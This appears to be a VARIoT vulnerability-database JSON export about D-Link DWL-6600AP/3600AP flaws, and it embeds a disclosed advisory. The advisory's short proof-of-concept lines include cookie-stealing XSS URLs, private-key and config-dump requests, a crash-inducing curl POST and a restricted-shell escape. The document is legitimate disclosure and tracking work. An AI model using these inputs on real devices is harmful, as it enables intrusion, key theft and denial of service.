"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146274"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"date": "2019-08-01T13:15:14.337000",
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"date": "2019-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-146274"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"date": "2019-08-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"date": "2024-11-21T04:26:32.490000",
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Device cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
],
"trust": 0.6
}
}
VAR-201908-0914
Vulnerability from variot - Updated: 2024-11-23 21:52
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authenticated dump of all of the config files through a certain admin.cgi?action= insecure HTTP request. The D-Link 6600-AP and DWL-3600AP devices contain an input validation vulnerability. Information may be obtained. D-Link DWL-6600AP is a dual-band unified management wireless access point device designed for enterprise environments. D-Link DWL-3600AP is a single-frequency unified management wireless access point device designed for enterprise environments.
D-Link DWL-6600AP and DWL-3600AP 4.2.0.14 have a configuration file dump vulnerability. A security vulnerability exists in D-Link 6600-AP and DWL-3600AP version 4.2.0.14.
Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Note that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
3. Pre-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID: CVE-2019-14333
Proof-of concept
kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
4. Escape shell in the restricted command line interface
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14337
Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# /bin/sh -c wget
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
  -s Spider mode - only check file existence
  -c Continue retrieval of aborted transfer
  -q Quiet
  -P DIR Save to DIR (default .)
  -T SEC Network read timeout is SEC seconds
  -O FILE Save to FILE ('-' for stdout)
  -U STR Use STR for User-Agent header
  -Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
5. Post-authenticated Denial of service leading to the reboot of the AP
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14335
Proof-of concept
http://10.90.90.91/admin.cgi?action=%s
6. Post-authenticated Dump all the config files
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14336
Proof-of concept
http://10.90.90.91/admin.cgi?action=
7. Use of weak ciphers
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14332
Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
Report Timeline
22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.
22/06/2019 : Public release of the security advisory to mailing list
Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
About me - pwn.sandstorm@gmail.com
Independent EMSecurity Researcher in the field of IoT under the Sun
Always open to hack and share
Greetings - Ack P. Kim and others for the online resources
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201908-0914",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.4,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "6600-ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "dwl-3600ap",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "4.2.0.14"
},
{
"model": "d-link 6600-ap",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "4.2.0.14"
},
{
"model": "dwl-6600ap",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "4.2.0.14"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sandstorm Security",
"sources": [
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
],
"trust": 0.7
},
"cve": "CVE-2019-14336",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14336",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 1.7,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.1,
"id": "CNVD-2019-39563",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:L/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 3.9,
"id": "VHN-146272",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14336",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-14336",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14336",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14336",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-39563",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1631",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146272",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated dump of all of the config files through a certain admin.cgi?action= insecure HTTP request. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Information may be obtained. D-Link DWL-6600AP is a dual-band unified management wireless access point device designed for enterprise environments. D-Link DWL-3600AP is a single-frequency unified management wireless access point device designed for enterprise environments. \n\nD-Link DWL-6600AP and DWL-3600AP 4.2.0.14 have configuration file dump vulnerability. A security vulnerability exists in D-Link 6600-AP and DWL-3600AP version 4.2.0.14. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. 
With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. 
Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n
### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. 
Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. 
\n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14336"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "NVD",
"id": "CVE-2019-14336",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-39563",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146272",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"id": "VAR-201908-0914",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
}
],
"trust": 1.4935897333333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
}
]
},
"last_update_date": "2024-11-23T21:52:00.555000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP configuration file dump vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/189045"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95741"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-20",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 2.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1631"
},
{
"db": "NVD",
"id": "CVE-2019-14336"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-39563"
},
{
"db": "VULHUB",
"id": "VHN-146272"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007492"
},
{
